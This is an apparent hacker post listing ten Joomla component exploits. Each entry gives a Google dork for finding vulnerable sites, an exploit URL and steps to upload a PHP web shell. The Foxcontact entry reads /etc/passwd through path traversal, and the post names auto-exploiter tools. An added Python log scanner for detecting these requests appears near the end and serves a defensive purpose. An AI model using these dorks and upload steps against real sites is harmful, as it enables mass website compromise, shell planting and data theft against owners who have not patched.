[+] Exploit Joomla! Full Pack

1. Com_Fabrik Exploit

Dork: inurl:index.php?option=com_fabrik

Exploit: index.php?option=com_fabrik&view=form&fabrik=form

Exploit: index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

Step: Find the upload/CSRF form → upload sc.

2. Com_Media Exploit

Dork: inurl:com_media site:com

Exploit: index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Step: Upload a .txt/.jpg file → site.com/images/filelu.txt.

3. Com_JCE Exploit

Dork: inurl:index.php?option=com_jce

Exploit: /plugins/editors/jce/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form

Step: Open the File Manager → upload shell → rename → access it directly via the public path.

[Exploit Joomla JCE Extension | Remote File Upload Vulnerability]

JCE Exploiter and JCE Exploiter PHP

Step: Open the JCE Exploiter, then enter the target and click Start. Full write-up: exploit joomla jce extension remote file upload

4. ElFinder Exploit

Dork: inurl:elfinder.html

Exploit: /elfinder/elfinder.html

Step: Open the elFinder UI → upload a file → open the direct link → TADA!

Auto exploiter elfinder

5. Com_JoomGallery Exploit

Dork: inurl:index.php?option=com_joomgallery

Exploit: index.php?option=com_joomgallery&func=detail&id=1

Step: Upload an image → insert PHP code → rename to shell.php.jpg → access it directly via the gallery.

6. Com_HDFlvPlayer Exploit

Dork: inurl:com_hdflvplayer

Exploit: /components/com_hdflvplayer/contus.php?upload=true

Step: Access the endpoint → upload a file → open the resulting upload URL.

7. Com_JDownloads Exploit

Dork: inurl:index.php?option=com_jdownloads

Exploit: /index.php?option=com_jdownloads&Itemid=0&view=upload

Step: Upload a file → check the /downloads/ path → access the file via its URL.

8. Com_Myblog Exploit

Dork: inurl:option=com_myblog

Exploit: index.php?option=com_myblog&task=profile.edit

Step: Upload an avatar with a .php5 extension → if it succeeds → access the shell directly.

9. Com_Foxcontact (LFI)

Dork: inurl:index.php?option=com_foxcontact

Exploit: index.php?option=com_foxcontact&view=loader&type=u&owner=file.txt

Step: Inject the path ../../../../etc/passwd → verify the contents of the server file.

10. Com_Chronocontact Exploit

Dork: inurl:index.php?option=com_chronocontact

Exploit: index.php?option=com_chronocontact&chronoform=[nama_form]

Step: Find the input form → try uploading a file → test an extension bypass → access the shell.


⚠️ Disclaimer & Notes

As of 2025, these exploits can still succeed if:

  • The target has not been updated or patched
  • It still runs an old version of Joomla! or the related plugin
  • Folder/file permissions are loose
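
A defender-side check for the requests listed above, as an added example that is not part of the original post: it scans web-server access logs (combined log format assumed) for POSTs to the listed components, the two standalone paths, traversal sequences in com_foxcontact parameters, and script-like files fetched from upload directories. The function names, the extra `phtml` extension and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Component names, paths and directories are the ones listed on this page.
UPLOAD_COMPONENTS = {"com_fabrik", "com_media", "com_jce", "com_joomgallery",
                     "com_jdownloads", "com_myblog", "com_chronocontact"}
STANDALONE_PATHS = ("/components/com_hdflvplayer/contus.php", "/elfinder/elfinder.html")
UPLOAD_DIRS = ("/images/", "/downloads/")
# Matches .php, .php5 or a double extension such as shell.php.jpg (phtml is an assumption).
SCRIPT_NAME = re.compile(r"\.(php\d?|phtml)(\.\w+)?$", re.I)
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(method, target):
    """Return the reasons a request deserves review (empty list if none)."""
    url = urlsplit(target)
    path = unquote(url.path).lower()
    query = parse_qs(url.query)  # values are percent-decoded here
    option = query.get("option", [""])[0].lower()
    reasons = []
    if path.endswith(STANDALONE_PATHS):
        reasons.append("standalone upload endpoint")
    if option in UPLOAD_COMPONENTS and method == "POST":
        reasons.append(f"POST to {option}")
    if option == "com_foxcontact" and any(".." in v for vs in query.values() for v in vs):
        reasons.append("path traversal in com_foxcontact parameter")
    if any(d in path for d in UPLOAD_DIRS) and SCRIPT_NAME.search(path):
        reasons.append("script-like file requested from upload directory")
    return reasons

def scan(lines):
    """Yield (client_ip, status, target, reasons) for each log line needing review."""
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        reasons = classify(method, target)
        if reasons:
            yield ip, int(status), target, reasons

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [01/Mar/2025:10:00:01 +0000] "POST /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Mar/2025:10:00:05 +0000] "GET /images/shell.php.jpg HTTP/1.1" 200 64',
    '198.51.100.9 - - [01/Mar/2025:10:02:00 +0000] "GET /index.php?option=com_foxcontact&view=loader&type=u&owner=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 403 0',
    '192.0.2.10 - - [01/Mar/2025:10:03:00 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A 200 status on a script-like file under an upload directory is the line to triage first, since it means the file exists and was served.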

This article is intended solely for educational purposes. The creator shall not be held liable for any misuse, illegal activities, or damages resulting from the unauthorized use of this material.


"Where creativity, exploitation, and expression collide." — 6ickZone
